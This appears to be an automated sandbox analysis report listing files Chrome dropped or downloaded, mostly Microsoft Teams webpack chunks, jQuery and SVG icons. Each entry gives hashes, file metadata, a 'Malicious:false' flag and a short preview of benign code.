                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[618332],{618332:(e,C,s)=>{s.d(C,{a:()=>n});var a=s(957032),t=s(395225),l=s.n(t),c=s(485529),i=s(829289);const n=(0,c.Ke)({svg:({classes:e})=>(0,a.Y)("svg",{role:"presentation",viewBox:"0 0 32 32",className:e.svg,children:[(0,a.Y)("g",{className:l()(i.Q.outline,e.outlinePart),children:(0,a.Y)("path",{d:"M16 30H2V16C2 8.26801 8.26801 2 16 2C23.732 2 30 8.26801 30 16C30 23.732 23.732 30 16 30ZM10 21V16C10 12.6863 12.6863 10 16 10C19.3137 10 22 12.6863 22 16C22 19.3137 19.3137 22 16 22H11.946C11.6621 24.5935 10.288 26.6306 8.51875 28H16C22.6274 28 28 22.6274 28 16C28 9.37258 22.6274 4 16 4C9.37258 4 4 9.37258 4 16V27.9112C6.86035 27.4156 10 24.8723 10 21ZM16 20C18.2091 20 20 18.2091 20 16C20 13.7909 18.2091 12 16 12C13.7909 12 12 13.7909 12 16V20H16Z"})}),(0,a.Y)("g",{className:l()(i.Q.filled,e.filledPart),children:(0,a.Y)("path",{d:"M30 16C30 8.26801 23.732 2 16 2C8.26801 2 2 8.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):89501
                                                                                                                                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):97850
                                                                                                                                                                                                                                                                            Entropy (8bit):5.493892052799283
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:23FpjFZJC0EncEOUi21jdNpor/ArvEPfKlK56kptA:2VhJC0EncE22HQpPfKlK5zA
                                                                                                                                                                                                                                                                            MD5:566DA242F6686B87C944560F980680AC
                                                                                                                                                                                                                                                                            SHA1:E6B12B496B7059868098714C644EF12156D90FAF
                                                                                                                                                                                                                                                                            SHA-256:08A384EF2B326C6885BD1D0DCD1086EE911B965AD8DA1FB3E62AB5EEDBD3C155
                                                                                                                                                                                                                                                                            SHA-512:62B9A176AE6B9ED612AAA28D674C6D21D7C7BE7C5A00E403526A6CBB2C7B0FA5EC9422AA5AB28208C7D23B3A9769AEA53C8D5AFA9C241E54A26B40E996B5AF15
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[500479],{156054:(e,t,n)=>{n.d(t,{j:()=>b});var r=n(340415),i=n(344411),a=n(680828),o=n(779497),s=n(179233),u=n(661187),l=n(679080),c=n(943085),f=["ACCDA","ACCDB","ACCDC","ACCDE","ACCDR","ACCDT","ACCDU","ACCDW","ACCFT","ADE","ADN","ADP","AVI","BMP","CSV","DOC","DOCX","DOT","DOTX","ERR","FON","GIF","HTML","ISO","JPEG","JPG","LACCDB","LDB","LOG","MAD","MAF","MAG","MAM","MAQ","MAR","MAS","MAT","MAU","MAV","MAW","MDA","MDBHTML","MDE","MDN","MDT","MDW","MOV","MP3","MPD","MPG","MPP","MPT","MPW","MPX","MSG","OLS","ONE","ONEPKG","ONETOC","ONETOC2","OST","PDF","PNG","POT","POTHTML","POTX","PPA","PPS","PPSX","PPT","PPTHTML","PPTMHTML","PPTX","PPTXML","PST","PUB","PWZ","RTF","SLDM","SLDX","SLK","THMX","TIF","TIFF","TSX","TTF","TXT","VDW","VDX","VHD","VSD","VSDM","VSDX","VSIX","VSL","VSS","VSSM","VSSX","VST","VSTM","VSTX","VSU","VSW","VSX","WAV","WIZHTML","WMA","WMV","WPL","XLS","XLSHTML"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):3651
                                                                                                                                                                                                                                                                            Entropy (8bit):4.094801914706141
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                                                                                                                                                                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                                                                                                                                                                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                                                                                                                                                                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                                                                                                                                                                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2415)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):2523
                                                                                                                                                                                                                                                                            Entropy (8bit):4.936941985388673
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3D3Z90ikSrl6iyfVCbbdm0i8CjQ6W60bvxamg:+ibrl5ytedg8KE60G
                                                                                                                                                                                                                                                                            MD5:A46DE267E5DDDBCFEDEB8F09EBCA224E
                                                                                                                                                                                                                                                                            SHA1:7CB86C8DBD48BCB3EADF6345571638F603AA83F0
                                                                                                                                                                                                                                                                            SHA-256:4FA2C10DC524A8BE22772F88CF2A4A6E1C9F4E88F67AFF5E2AB220167B842CE7
                                                                                                                                                                                                                                                                            SHA-512:488727A3601F6AA285AD548E411D315F957CFBBC671A4C7F179FB0DE57B0DBC65E0AC91BCBBE55DBFBFAD8C2672202A6F2A5734AA841E9B7BACE671DBB31FF14
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[273198],{273198:(e,C,t)=>{t.d(C,{C:()=>r});var a=t(513432),l=t(395225),n=t.n(l),c=t(485529),s=t(829289),r=(0,c.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:n()(s.Q.outline,C.outlinePart)},a.createElement("path",{d:"M7 11C7.55228 11 8 10.5523 8 10C8 9.44771 7.55228 9 7 9C6.44772 9 6 9.44771 6 10C6 10.5523 6.44772 11 7 11Z"}),a.createElement("path",{d:"M8 13C8 13.5523 7.55228 14 7 14C6.44772 14 6 13.5523 6 13C6 12.4477 6.44772 12 7 12C7.55228 12 8 12.4477 8 13Z"}),a.createElement("path",{d:"M10 11C10.5523 11 11 10.5523 11 10C11 9.44771 10.5523 9 10 9C9.44771 9 9 9.44771 9 10C9 10.5523 9.44771 11 10 11Z"}),a.createElement("path",{d:"M11 13C11 13.5523 10.5523 14 10 14C9.44771 14 9 13.5523 9 13C9 12.4477 9.44771 12 10 12C10.5523 12 11 12.4477 11 13Z"}),a.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (10064)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):10172
                                                                                                                                                                                                                                                                            Entropy (8bit):4.547550271846478
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:1DCvHrSSd6kElXg4CFo4Qo420u+gUutyhmRpHphG:1DcSSkHlR4Z4xu+gTe
                                                                                                                                                                                                                                                                            MD5:53E24C0FC810CB59D318C9FB914D84E6
                                                                                                                                                                                                                                                                            SHA1:C108CA6642908D3DB4BE4A65084B367011309508
                                                                                                                                                                                                                                                                            SHA-256:E1F3872C5FFF14038BA2EE76FBB8DF2AF221B860CEEEF632492BF98B6AA344F8
                                                                                                                                                                                                                                                                            SHA-512:2AC0369C9E80360FDBF2F7D9F5A0E8239FAC737FF86144DCB0CD003031786AEA11F64A143ABD3C278C345030501E95E6133C080EA98680A709870A831A95147D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[214218],{214218:(a,c,h)=>{h.d(c,{Eu3:()=>l,wYX:()=>Z,giK:()=>r,skF:()=>e,rKg:()=>H,t8b:()=>V,prg:()=>A,vqi:()=>M,Ptq:()=>m,mhc:()=>C,uVC:()=>d,rc1:()=>u,zVV:()=>U,bq_:()=>o,d2l:()=>p,jz:()=>t,$2:()=>g,CDe:()=>i,fS5:()=>R,rZY:()=>s,E4E:()=>w,bqg:()=>L,wx:()=>n,Ho1:()=>F,RJg:()=>k,dCO:()=>_});var v=h(693935);const l=(0,v.U)("Add20Regular","20",["M10 2.5a.5.5 0 0 0-1 0V9H2.5a.5.5 0 0 0 0 1H9v6.5a.5.5 0 0 0 1 0V10h6.5a.5.5 0 0 0 0-1H10V2.5Z"]),Z=(0,v.U)("Add24Regular","24",["M11.75 3c.38 0 .7.28.74.65l.01.1V11h7.25a.75.75 0 0 1 .1 1.5H12.5v7.25a.75.75 0 0 1-1.49.1V12.5H3.74a.75.75 0 0 1-.1-1.5H11V3.75c0-.41.34-.75.75-.75Z"]),r=(0,v.U)("AddCircle24Filled","24",["M12 2a10 10 0 1 1 0 20 10 10 0 0 1 0-20Zm0 5c-.38 0-.7.28-.74.65l-.01.1v3.5h-3.5a.75.75 0 0 0-.1 1.5h3.6v3.5a.75.75 0 0 0 1.5.1v-3.6h3.5a.75.75 0 0 0 .1-1.5h-3.6v-3.5A.75.75 0 0 0 12 7Z"]),e=(0,v.U)("AddCircle24Regular","2
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (16073)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):16216
                                                                                                                                                                                                                                                                            Entropy (8bit):4.819465766419485
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:ys3Ja7t6zrFEOcsyB1w4saUut7gGQed7iLOy9XUWKVm/Zm2Z3Wy7TQDvi5hxXM/f:ySa7umBpvcNAVMZ79y0O
                                                                                                                                                                                                                                                                            MD5:A5FEB36E9E2D1F582AE5CDDDDB931036
                                                                                                                                                                                                                                                                            SHA1:FB27DD5E04BF84483F125DA2D7D5EFEFC782F375
                                                                                                                                                                                                                                                                            SHA-256:CB8EEB22A1B111840BD22EE3B68C6B31FB33314485517CF6F0667BD89E9DEEB3
                                                                                                                                                                                                                                                                            SHA-512:3EE561D91CF85F20CA5A0D75926A19EEED2672197430EE522BFDB3D8FCB3C8D96DA89C011752F27290C60209D5C7EE4D0C440620F0B583AD374AB552C8F252A2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/premium-benefits-locale-en-us-d3ac48e6f6ea2d95.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[78047],{890679:(e,t,i)=>{i.r(t),i.d(t,{default:()=>a});const a={namespace:"premiumBenefits",locale:"en-us",translations:{current_plan_names:"{{planName1}} & {{planName2}}",current_plan_title:"Your free benefits",discover_try_buy_60_days_trial:"60-day trial, no card required",discover_try_buy_60_days_trial_exp:"Free 60-day trial, subject to eligibility",discover_try_buy_banner_count_down_mf:"{count, plural, =0 {You have # days left in your Teams Premium trial. Get the most out of premium features like AI-powered recaps, advanced meeting protection, and extra event engagement tools. <0>View all your benefits</0>} =1 {You have # day left in your Teams Premium trial. Get the most out of premium features like AI-powered recaps, advanced meeting protection, and extra event engagement tools. <0>View all your benefits</0>} other {You have # days left in your Teams Premium trial. Get
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (29175)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):29283
                                                                                                                                                                                                                                                                            Entropy (8bit):6.0986751003568695
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:33bIUDP6rukgBSCbljklj/Djkn5qkIWRwxNk+UysJHYFwrs7:MUbW/OdJjojrjtHk+6t6
                                                                                                                                                                                                                                                                            MD5:53A5C6EBE38F15D4226EC6CB4AC1A08B
                                                                                                                                                                                                                                                                            SHA1:BA0DB03E262394B04AD33B8FA69844C079D8906C
                                                                                                                                                                                                                                                                            SHA-256:D46EA577C50DFAB51F1AABF584DC2D0FADE0CCD4B73DF82FF90786B71F6025E8
                                                                                                                                                                                                                                                                            SHA-512:601FBE45B688495CEC2AC199FAE5BD2B02EE29FEEB0E1B94713305BBED320E4FAD32A46B094E300C4018DBB7BEEE1BDDD9A670277A184FDE502C91F941FEF31C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/780368-3e86a874e98fee98.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[780368],{98332:(M,e,A)=>{A.d(e,{p:()=>g});var D=A(469754),N=A.n(D);class I extends(N()){constructor(M,e,A={sanitizeBatchLoadFn:!0}){super(A.sanitizeBatchLoadFn?function(M,e){return async function(A){const D=await M(A);return A.forEach(((M,A)=>{const N=D[A];if(null==N||N instanceof Error||"object"==typeof M)return;if(M!==e(N))throw new Error(`DataLoader must be constructed with a function which accepts Array<key> and returns Promise<Array<value>>, where the order of values corresponds to the order of keys from the input array. Value and key at index ${A} do not match: (\n\nKey:\n${M})\n\nValue:\n${N}`)})),D}}(M,e):M,A),this.keyFn=e}getKey(M){return this.keyFn(M)}}function a(M){return M instanceof I}class g{constructor(M,e){this.context=M,this.dataLoaderImplementations=new Map,this.DATALOADER_BY_ID="BY_ID",this.isNode=M=>null!==M&&!(M instanceof Error),this.getId=this.getId.bin
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48765)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):48873
                                                                                                                                                                                                                                                                            Entropy (8bit):5.585752148083214
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:p06I3vBPzL+0nyD9dq80ijv+SrLySSwTy27x2TiosDmp1s7HUhQGOp58dM8++3NJ:y5nOqQhqsTuk8+kqRmn8A3
                                                                                                                                                                                                                                                                            MD5:C9D09D37639FC20B3B1FD87A64E94E3E
                                                                                                                                                                                                                                                                            SHA1:E3B248AA3D8D9740E9538A66DC667CD8495492EA
                                                                                                                                                                                                                                                                            SHA-256:EACE750A63245218251A76104B17B464095CFB1790D5F4412CD63790030580B6
                                                                                                                                                                                                                                                                            SHA-512:98B6AAB9BA7E99F71AE92C05FC1582A5CC0506287CFC09D13EF91D3147E445AC4121395C850058BCAC02E2324353E264A99CBB68AFF9014CB1D8FF12C1109732
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/811751-33667fc00931d10b.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[811751],{811751:(e,a,t)=>{t.d(a,{V:()=>Ve});var n=t(513432),r=t(48374),i=t(589256),o=t(35871);let s;function l(e,a){if(e){if(s)return void(s=e);s=e,a&&a.requestAnimationFrame((()=>{s&&s.focus(),s=void 0}))}}var f=t(517822),c=t(312798),d=t(754814),u=t(526521),m=t(796831),y=t(411947);const g=(e,a,t)=>{let n=[...e];return a&&(n=n.filter((e=>(0,d.F4)(e,a)>=0))),t&&(n=n.filter((e=>(0,d.F4)(e,t)<=0))),n},b=(e,a)=>{const{minDate:t}=a;return!!t&&(0,d.F4)(t,e)>=1},h=(e,a)=>{const{maxDate:t}=a;return!!t&&(0,d.F4)(e,t)>=1},v=(e,a)=>{const{restrictedDates:t,minDate:n,maxDate:r}=a;if(!t&&!n&&!r)return!1;return t&&t.some((a=>(0,d.H$)(a,e)))||b(e,a)||h(e,a)};var k=t(336290);const B=e=>{const{showWeekNumbers:a,strings:t,firstDayOfWeek:r,allFocusable:i,weeksToShow:o,weeks:s,classNames:l}=e,c=t.shortDays.slice();let d=-1;const m=s[1];for(let e=0;e<s[1].length;e++)if(1===m[e].originalDate.getDa
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65527), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):596983
                                                                                                                                                                                                                                                                            Entropy (8bit):5.131989087220856
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:sBQ0RWGn23iuWjR438c7xhBCW0XVdyVCi3yew5iZCfombq:j0RD2SDR+hwJVdoyew5iZCfoL
                                                                                                                                                                                                                                                                            MD5:4CC9D863D7DDA372C249C8E2CB95BEF4
                                                                                                                                                                                                                                                                            SHA1:49C098B155E69BECD9822A23D2019A4100E4D1B0
                                                                                                                                                                                                                                                                            SHA-256:826DFE82707BCAF68971344648AE68ADEF1F20AFB5BEF79073754390D2E6F916
                                                                                                                                                                                                                                                                            SHA-512:19D5C3A258215D15D4AA3230A3304D35C67A83D52F453C04F9510FCC9A3EF6A2A08EBC7B4DD35D1E5A2CEBA2C01A481DD1106A50ED7C3802B0B376D37A382164
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/370494-2a1675e78ae9629b.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[370494],{704022:(e,t,n)=>{"use strict";n.d(t,{A:()=>s});const i=["figcaption","li"];function s(e){let t="";if(e.is("$text")||e.is("$textProxy"))t=e.data;else if(e.is("element","img")&&e.hasAttribute("alt"))t=e.getAttribute("alt");else if(e.is("element","br"))t="\n";else{let n=null;for(const o of e.getChildren()){const e=s(o);n&&(n.is("containerElement")||o.is("containerElement"))&&(i.includes(n.name)||i.includes(o.name)?t+="\n":t+="\n\n"),t+=e,n=o}}return t}},153879:(e,t,n)=>{var i;e=n.nmd(e),self,i=()=>(()=>{"use strict";var i={4199:(e,t,n)=>{n.d(t,{A:()=>o});var i=n(935),s=n.n(i)()((function(e){return e[1]}));s.push([e.id,".ck-content code{background-color:hsla(0,0%,78%,.3);border-radius:2px;padding:.15em}.ck.ck-editor__editable .ck-code_selected{background-color:hsla(0,0%,78%,.5)}",""]);const o=s},7793:(e,t,n)=>{n.d(t,{A:()=>o});var i=n(935),s=n.n(i)()((function(e){return e[1]}));s.pus
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (20845)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):20952
                                                                                                                                                                                                                                                                            Entropy (8bit):5.312655616899363
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:Xvr3TLvGAkYt54AlLR3Rr6yRZvS1RdWspv8CHSIJ+t4l1:XvPrRT+z
                                                                                                                                                                                                                                                                            MD5:0DA43D7DD5D49C8E50684556326AEEA6
                                                                                                                                                                                                                                                                            SHA1:8308F2C481046EE86F6FA114948131B82E841F98
                                                                                                                                                                                                                                                                            SHA-256:BF86140F152FCCF6763F7B46B18E7F78D2FDFD6B18FD6684E741E0104C415F61
                                                                                                                                                                                                                                                                            SHA-512:B8EA54E4C46839E8AB211D4562296C06F7540AE463C33A2F510F6851DED718553F4EF4C2733E2D6572943828439B7AF3EF4A7705D67C071DB1EC2AE60DC477D1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[94139],{214238:(t,e,r)=>{function n(t,e){if(null==t)throw new TypeError("assign requires that input parameter not be null or undefined");for(var r in e=e||{})Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r]);return t}r.d(e,{A:()=>n})},94139:(t,e,r)=>{r.d(e,{A:()=>ot});var n=r(864627),a=r(798202),i=r(805247),o=r(214238),u=r(489176),s=r(997464),c=r(896825),d=r(650616),l=r(336116),f=r(425179);function w(t,e,r){(0,f.A)(2,arguments);var n=r||{},a=n.locale,o=a&&a.options&&a.options.weekStartsOn,u=null==o?0:(0,d.A)(o),s=null==n.weekStartsOn?u:(0,d.A)(n.weekStartsOn);if(!(s>=0&&s<=6))throw new RangeError("weekStartsOn must be between 0 and 6 inclusively");var c=(0,i.A)(t),l=(0,d.A)(e),w=((l%7+7)%7<s?7:0)+l-c.getUTCDay();return c.setUTCDate(c.getUTCDate()+w),c}var h=r(315391);var m=r(534711);var b=r(510327),T=r(715394),p=/^(1[0-2]|0?\d)/,y=/^(3[0-1]|[0-2]?\d)/,g=/^(36[0-6]|3[0-5]
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1592
                                                                                                                                                                                                                                                                            Entropy (8bit):4.205005284721148
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                                                                                                                                                                                                                            MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                                                                                                                                                                                                                            SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                                                                                                                                                                                                                            SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                                                                                                                                                                                                                            SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (7902)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):8010
                                                                                                                                                                                                                                                                            Entropy (8bit):5.293871497905616
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:QxM0ytizz70XhjrgRn7Ekl12Tuyd61aYoxG3wjs:uM0WUwXhf+IklI6yAEYoxG3wI
                                                                                                                                                                                                                                                                            MD5:E62051243249EC6F803DD2B7E785281D
                                                                                                                                                                                                                                                                            SHA1:12DB14106F5898E612497E89FD3B77978F25F3F6
                                                                                                                                                                                                                                                                            SHA-256:79E3BCA0BA57C50F34F306B64A1EDDD3F053629C9CF9BB54CFE5257A3B1C1859
                                                                                                                                                                                                                                                                            SHA-512:4610FB7F66728556DF7971018B7A17D06C1AF0C454AA8A7D0B377C79DA217BD0D4F7A8835A066A73CD2C59FCF33EA3C98431ABA9E5AE307BD36CE00CC812EDAE
                                                                                                                                                                                                                                                                            Malicious:false
